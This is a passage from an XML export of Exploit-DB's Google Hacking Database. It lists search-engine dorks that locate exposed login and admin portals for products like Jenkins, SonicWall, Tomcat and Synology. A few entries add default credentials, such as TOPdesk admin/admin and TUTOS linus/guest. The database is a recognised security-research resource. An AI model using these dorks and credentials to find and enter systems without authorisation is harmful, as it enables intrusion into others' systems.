<date>2020-05-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6824</id>
<link>https://www.exploit-db.com/ghdb/6824</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sign in to Cisco Finesse&quot;</shortDescription>
<textualDescription># Exploit Title: Cisco Finesse login portal
# Google Dork: intitle:&quot;Sign in to Cisco Finesse&quot;
# Author: Kitchaphan Singchai (idealphase)
# Category: Pages Containing Login Portals
</textualDescription>
<query>intitle:&quot;Sign in to Cisco Finesse&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sign in to Cisco Finesse&quot;</querystring>
<edb></edb>
<date>2021-03-11</date>
<author>idealphase</author>
</entry>
<entry>
<id>7475</id>
<link>https://www.exploit-db.com/ghdb/7475</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sign in [Jenkins]&quot; inurl:&quot;login?from&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Sign in [Jenkins]&quot; inurl:&quot;login?from&quot;
# Pages Containing Login Portals
# Date:21/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;Sign in [Jenkins]&quot; inurl:&quot;login?from&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sign in [Jenkins]&quot; inurl:&quot;login?from&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Suman Das</author>
</entry>
<entry>
<id>4552</id>
<link>https://www.exploit-db.com/ghdb/4552</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sign in · GitLab&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Sign in · GitLab&quot;
Description: Find GitLab servers
Author: scumsec</textualDescription>
<query>intitle:&quot;Sign in · GitLab&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sign in · GitLab&quot;</querystring>
<edb></edb>
<date>2017-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5346</id>
<link>https://www.exploit-db.com/ghdb/5346</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;sign in&quot; inurl:login.aspx</shortDescription>
<textualDescription>login portal
intitle:&quot;sign in&quot; inurl:login.aspx
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;sign in&quot; inurl:login.aspx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;sign in&quot; inurl:login.aspx</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5699</id>
<link>https://www.exploit-db.com/ghdb/5699</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sign in&quot; site:*/idaas/</shortDescription>
<textualDescription>Login Portal:
intitle:&quot;Sign in&quot; site:*/idaas/
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Sign in&quot; site:*/idaas/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sign in&quot; site:*/idaas/</querystring>
<edb></edb>
<date>2020-01-23</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>964</id>
<link>https://www.exploit-db.com/ghdb/964</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;site administration: please log in&quot; &quot;site designed by emarketsouth&quot;</shortDescription>
<textualDescription>Real Estate software package, with the admin login screen</textualDescription>
<query>intitle:&quot;site administration: please log in&quot; &quot;site designed by emarketsouth&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22site+administration:+please+log+in%22+%22site+designed+by+emarketsouth%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6624</id>
<link>https://www.exploit-db.com/ghdb/6624</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SiteOmat Loader&quot;</shortDescription>
<textualDescription># Exploit Title: Orpak SiteOmat login portals
# Google Dork: intitle:&quot;SiteOmat Loader&quot;
# Author: Kitchaphan Singchai (idealphase)
</textualDescription>
<query>intitle:&quot;SiteOmat Loader&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SiteOmat Loader&quot;</querystring>
<edb></edb>
<date>2020-10-20</date>
<author>idealphase</author>
</entry>
<entry>
<id>4116</id>
<link>https://www.exploit-db.com/ghdb/4116</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SmarterMail Login&quot; inurl:&quot;/Login.aspx&quot;</shortDescription>
<textualDescription>Login for SmarterMail Enterprise
-Xploit </textualDescription>
<query>intitle:&quot;SmarterMail Login&quot; inurl:&quot;/Login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SmarterMail Login&quot; inurl:&quot;/Login.aspx&quot;</querystring>
<edb></edb>
<date>2015-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4360</id>
<link>https://www.exploit-db.com/ghdb/4360</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SonicWALL - Authentication&quot;</shortDescription>
<textualDescription>SonicWALL firewall login portals
Google Dork: intitle:&quot;SonicWALL - Authentication&quot;
Date: 2016-11-28
Author: Devendra Singh Solanki</textualDescription>
<query>intitle:&quot;SonicWALL - Authentication&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SonicWALL - Authentication&quot;</querystring>
<edb></edb>
<date>2016-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>7458</id>
<link>https://www.exploit-db.com/ghdb/7458</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SonicWall Analyzer Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SonicWall Analyzer Login&quot;
# Pages Containing Login Portals
# Date:18/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>intitle:&quot;SonicWall Analyzer Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SonicWall Analyzer Login&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>7107</id>
<link>https://www.exploit-db.com/ghdb/7107</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SonicWall Network Security Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SonicWall Network Security Login&quot;
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;SonicWall Network Security Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SonicWall Network Security Login&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7478</id>
<link>https://www.exploit-db.com/ghdb/7478</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sophos&quot; inurl:/userportal/webpages/myaccount/login.jsp</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Sophos&quot; inurl:/userportal/webpages/myaccount/login.jsp
# Pages Containing Login Portals
# Date:22/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>intitle:&quot;Sophos&quot; inurl:/userportal/webpages/myaccount/login.jsp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sophos&quot; inurl:/userportal/webpages/myaccount/login.jsp</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>4866</id>
<link>https://www.exploit-db.com/ghdb/4866</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SSL VPN Service&quot; + intext:&quot;Your system administrator provided the following information to help understand and remedy the security conditions:&quot;</shortDescription>
<textualDescription>Show Cisco asa login web page which maybe contain new Cisco's CVEs
ManhNho
</textualDescription>
<query>intitle:&quot;SSL VPN Service&quot; + intext:&quot;Your system administrator provided the following information to help understand and remedy the security conditions:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SSL VPN Service&quot; + intext:&quot;Your system administrator provided the following information to help understand and remedy the security conditions:&quot;</querystring>
<edb></edb>
<date>2018-06-22</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7933</id>
<link>https://www.exploit-db.com/ghdb/7933</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ST Web Client&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ST Web Client&quot;
# Pages Containing Login Portals
# Date: 20/04/2021
# Exploit Author: Nathan Cavitt</textualDescription>
<query>intitle:&quot;ST Web Client&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ST Web Client&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Nathan Cavitt</author>
</entry>
<entry>
<id>7490</id>
<link>https://www.exploit-db.com/ghdb/7490</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Student&quot; inurl:&quot;login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Student&quot; inurl:&quot;login.aspx&quot;
# Pages Containing Login Portals
# Date:25/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;Student&quot; inurl:&quot;login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Student&quot; inurl:&quot;login.aspx&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Suman Das</author>
</entry>
<entry>
<id>1150</id>
<link>https://www.exploit-db.com/ghdb/1150</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Supero Doctor III&quot; -inurl:supermicro</shortDescription>
<textualDescription>&quot;Supero Doctor III Remote Management&quot; by Supermicro, Inc.info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password...</textualDescription>
<query>intitle:&quot;Supero Doctor III&quot; -inurl:supermicro</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Supero+Doctor+III%22+-inurl%3Asupermicro</querystring>
<edb></edb>
<date>2005-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>890</id>
<link>https://www.exploit-db.com/ghdb/890</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SuSE Linux Openexchange Server&quot; &quot;Please activate JavaScript!&quot;</shortDescription>
<textualDescription>Another way to find the web administration portal of linux open exchange servers.</textualDescription>
<query>intitle:&quot;SuSE Linux Openexchange Server&quot; &quot;Please activate JavaScript!&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22SuSE+Linux+Openexchange+Server%22+%22Please+activate+JavaScript%21%22</querystring>
<edb></edb>
<date>2005-03-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>8006</id>
<link>https://www.exploit-db.com/ghdb/8006</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Synnefo Admin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Synnefo Admin&quot;
# Pages Containing Login Portals
# Date:25/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;Synnefo Admin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Synnefo Admin&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7106</id>
<link>https://www.exploit-db.com/ghdb/7106</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Synology Disk Station&quot; intext:&quot;System administrator&quot; &quot;login&quot;</shortDescription>
<textualDescription># intitle:&quot;Synology Disk Station&quot; intext:&quot;System administrator&quot; &quot;login&quot;
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Synology Disk Station&quot; intext:&quot;System administrator&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Synology Disk Station&quot; intext:&quot;System administrator&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7983</id>
<link>https://www.exploit-db.com/ghdb/7983</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;System Administration&quot; inurl:top.cgi</shortDescription>
<textualDescription>#Google Dork: intitle:&quot;System Administration&quot; inurl:top.cgi
# Pages Containing Login Portals
# Date:20/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;System Administration&quot; inurl:top.cgi</query>
<querystring>https://www.google.com/search?q=intitle:&quot;System Administration&quot; inurl:top.cgi</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7069</id>
<link>https://www.exploit-db.com/ghdb/7069</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;system login&quot; &quot;Drake Holdings&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;system login&quot; &quot;Drake Holdings&quot;
# Category: Pages Containing Login Portals
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;system login&quot; &quot;Drake Holdings&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;system login&quot; &quot;Drake Holdings&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7155</id>
<link>https://www.exploit-db.com/ghdb/7155</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TD-W9970&quot; intext:&quot;Model No. TD-W9970&quot; -tp-link.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;TD-W9970&quot; intext:&quot;Model No. TD-W9970&quot; -tp-link.com
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;TD-W9970&quot; intext:&quot;Model No. TD-W9970&quot; -tp-link.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TD-W9970&quot; intext:&quot;Model No. TD-W9970&quot; -tp-link.com</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6936</id>
<link>https://www.exploit-db.com/ghdb/6936</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Teampass&quot; intext:&quot;Server Time&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Teampass&quot; intext:&quot;Server Time&quot;</textualDescription>
<query>intitle:&quot;Teampass&quot; intext:&quot;Server Time&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Teampass&quot; intext:&quot;Server Time&quot;</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>415</id>
<link>https://www.exploit-db.com/ghdb/415</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;teamspeak server-administration</shortDescription>
<textualDescription>TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal.</textualDescription>
<query>intitle:&quot;teamspeak server-administration</query>
<querystring>https://www.google.com/search?q=intitle%3A%22teamspeak+server-administration</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>7819</id>
<link>https://www.exploit-db.com/ghdb/7819</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Teltonika -Web UI&quot; | intitle:&quot;Teltonika-RUT -Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Teltonika -Web UI&quot; | intitle:&quot;Teltonika-RUT -Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;
# Pages Containing Login Portals
# Date: 16/11/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Teltonika -Web UI&quot; | intitle:&quot;Teltonika-RUT -Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Teltonika -Web UI&quot; | intitle:&quot;Teltonika-RUT -Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;</querystring>
<edb></edb>
<date>2021-11-17</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7196</id>
<link>https://www.exploit-db.com/ghdb/7196</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TestRail&quot; inurl:&quot;/index.php?/auth/login/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:”TestRail” inurl:”/index.php?/auth/login/“
# Pages Containing Login Portals
# Date: 06/09/2021
# Exploit Author: Vismit Rakhecha</textualDescription>
<query>intitle:&quot;TestRail&quot; inurl:&quot;/index.php?/auth/login/&quot;</query>
<querystring>https://www.google.com/search?client=firefox-b-d&amp;q=intitle%3A%E2%80%9DTestRail%E2%80%9D+inurl%3A%E2%80%9D%2Findex.php%3F%2Fauth%2Flogin%2F%E2%80%9C</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Vismit Rakhecha</author>
</entry>
<entry>
<id>5659</id>
<link>https://www.exploit-db.com/ghdb/5659</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TMSoft MyAuth Gateway 3&quot; -DOWNLOAD</shortDescription>
<textualDescription>Dork for search any pages of MyAuth software
</textualDescription>
<query>intitle:&quot;TMSoft MyAuth Gateway 3&quot; -DOWNLOAD</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TMSoft MyAuth Gateway 3&quot; -DOWNLOAD</querystring>
<edb></edb>
<date>2019-12-02</date>
<author>sh4d0w</author>
</entry>
<entry>
<id>483</id>
<link>https://www.exploit-db.com/ghdb/483</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Tomcat Server Administration&quot;</shortDescription>
<textualDescription>This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server.</textualDescription>
<query>intitle:&quot;Tomcat Server Administration&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Tomcat+Server+Administration%22</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1038</id>
<link>https://www.exploit-db.com/ghdb/1038</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TOPdesk ApplicationServer&quot;</shortDescription>
<textualDescription>Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on.</textualDescription>
<query>intitle:&quot;TOPdesk ApplicationServer&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22TOPdesk+ApplicationServer%22</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>6917</id>
<link>https://www.exploit-db.com/ghdb/6917</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TOTOLINK&quot; inurl:&quot;/login.htm&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;TOTOLINK&quot; inurl:&quot;/login.htm&quot;
# (TOTOLink Router) Various Online Devices
# Exploit Author: Shivani Arya
</textualDescription>
<query>intitle:&quot;TOTOLINK&quot; inurl:&quot;/login.htm&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TOTOLINK&quot; inurl:&quot;/login.htm&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Shivani Arya</author>
</entry>
<entry>
<id>7546</id>
<link>https://www.exploit-db.com/ghdb/7546</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TOTVS SmartClient HTML - Parâmetros Iniciais&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;TOTVS SmartClient HTML - Parâmetros Iniciais&quot;
# Pages Containing Login Portals
# Date: 30/10/2021
# Exploit Author: Dennis Silva
</textualDescription>
<query>intitle:&quot;TOTVS SmartClient HTML - Parâmetros Iniciais&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TOTVS SmartClient HTML - Parâmetros Iniciais&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Dennis Silva</author>
</entry>
<entry>
<id>477</id>
<link>https://www.exploit-db.com/ghdb/477</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TUTOS Login&quot;</shortDescription>
<textualDescription>TUTOS stands for &quot;The Ultimate Team Organization Software.&quot; This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now.</textualDescription>
<query>intitle:&quot;TUTOS Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22TUTOS+Login%22</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1359</id>
<link>https://www.exploit-db.com/ghdb/1359</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TWIG Login&quot;</shortDescription>
<textualDescription>&quot;TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements.&quot;</textualDescription>
<query>intitle:&quot;TWIG Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22TWIG%20Login%22</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7474</id>
<link>https://www.exploit-db.com/ghdb/7474</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;TYPO3 CMS Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;TYPO3 CMS Login&quot;
# Pages Containing Login Portals
# Date:21/10/2021
# Exploit Author: Simone Crema</textualDescription>
<query>intitle:&quot;TYPO3 CMS Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TYPO3 CMS Login&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Simone Crema</author>
</entry>
<entry>
<id>6993</id>
<link>https://www.exploit-db.com/ghdb/6993</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Ubiquiti&quot; intext:&quot;Please login to manage your wireless device.&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Ubiquiti&quot; intext:&quot;Please login to manage your wireless device.&quot;</textualDescription>
<query>intitle:&quot;Ubiquiti&quot; intext:&quot;Please login to manage your wireless device.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Ubiquiti&quot; intext:&quot;Please login to manage your wireless device.&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8277</id>
<link>https://www.exploit-db.com/ghdb/8277</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Unibox Administration&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Unibox Administration&quot;
# Pages Containing Login Portals
# Date: 25/10/2023
# Exploit Hetkumar Desai</textualDescription>
<query>intitle:&quot;Unibox Administration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Unibox Administration&quot;</querystring>
<edb></edb>
<date>2023-10-25</date>
<author>Hetkumar Desai</author>
</entry>
<entry>
<id>6866</id>
<link>https://www.exploit-db.com/ghdb/6866</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;UniFi Video&quot; &quot;login&quot; &quot;NVR&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;UniFi Video&quot; &quot;login&quot; &quot;NVR&quot;
# Pages Containing Login Portals
# Date: 08/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;UniFi Video&quot; &quot;login&quot; &quot;NVR&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;UniFi Video&quot; &quot;login&quot; &quot;NVR&quot;</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>8009</id>
<link>https://www.exploit-db.com/ghdb/8009</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;User Authentication : IR*&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;User Authentication : IR*&quot;
# Pages Containing Login Portals
# Date:25/07/2022
# Exploit Author: Luke Stark</textualDescription>
<query>intitle:&quot;User Authentication : IR*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;User Authentication : IR*&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Luke Stark</author>
</entry>
<entry>
<id>7157</id>
<link>https://www.exploit-db.com/ghdb/7157</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Users&quot; intext:&quot;Read License&quot; intext:&quot;vtiger.com&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Users&quot; intext:&quot;Read License&quot; intext:&quot;vtiger.com&quot;
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Users&quot; intext:&quot;Read License&quot; intext:&quot;vtiger.com&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Users&quot; intext:&quot;Read License&quot; intext:&quot;vtiger.com&quot;</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>762</id>
<link>https://www.exploit-db.com/ghdb/762</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;vhost&quot; intext:&quot;vHost . 2000-2004&quot;</shortDescription>
<textualDescription>vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks.</textualDescription>
<query>intitle:&quot;vhost&quot; intext:&quot;vHost . 2000-2004&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22vhost%22+intext%3A%22vHost+.+2000-2004%22</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7063</id>
<link>https://www.exploit-db.com/ghdb/7063</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Video web server&quot; &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Video web server&quot; &quot;login&quot;
# Category: Pages Containing Login Portals
# Date: 02/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Video web server&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Video web server&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6988</id>
<link>https://www.exploit-db.com/ghdb/6988</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Viewer for Samsung NVR&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Viewer for Samsung NVR&quot;
# Date: 28/05/2021
# Exploit Author: Cuma KURT
# Pages Containing Login Portals
Cuma KURT
*Ethical Hacker | İnformation Security Engineer
Istanbul - Turkey
</textualDescription>
<query>intitle:&quot;Viewer for Samsung NVR&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Viewer for Samsung NVR&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>Cuma KURT</author>
</entry>
<entry>
<id>4367</id>
<link>https://www.exploit-db.com/ghdb/4367</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Vigor Login Page&quot;</shortDescription>
<textualDescription>Vigor router login panel
Google Dork: intitle:&quot;Vigor Login Page&quot;
Date: 2016-12-01
Author: Devendra Singh Solanki</textualDescription>
<query>intitle:&quot;Vigor Login Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Vigor Login Page&quot;</querystring>
<edb></edb>
<date>2016-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7064</id>
<link>https://www.exploit-db.com/ghdb/7064</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;vigor login page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;vigor login page&quot;
# Category: Pages Containing Login Portals
# Date: 02/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;vigor login page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;vigor login page&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>3962</id>
<link>https://www.exploit-db.com/ghdb/3962</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;virtual office&quot; sonicwall domain</shortDescription>
<textualDescription>Network or vulnerability data
IP address AD Domain NameLogin entry/method for internal network
</textualDescription>
<query>intitle:&quot;virtual office&quot; sonicwall domain</query>
<querystring>https://www.google.com/search?q=intitle:&quot;virtual office&quot; sonicwall domain</querystring>
<edb></edb>
<date>2014-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>597</id>
<link>https://www.exploit-db.com/ghdb/597</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Virtual Server Administration System&quot;</shortDescription>
<textualDescription>VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus.</textualDescription>
<query>intitle:&quot;Virtual Server Administration System&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Virtual+Server+Administration+System%22</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>995</id>
<link>https://www.exploit-db.com/ghdb/995</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;VisNetic WebMail&quot; inurl:&quot;/mail/&quot;</shortDescription>
<textualDescription>VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer.</textualDescription>
<query>intitle:&quot;VisNetic WebMail&quot; inurl:&quot;/mail/&quot;</query>
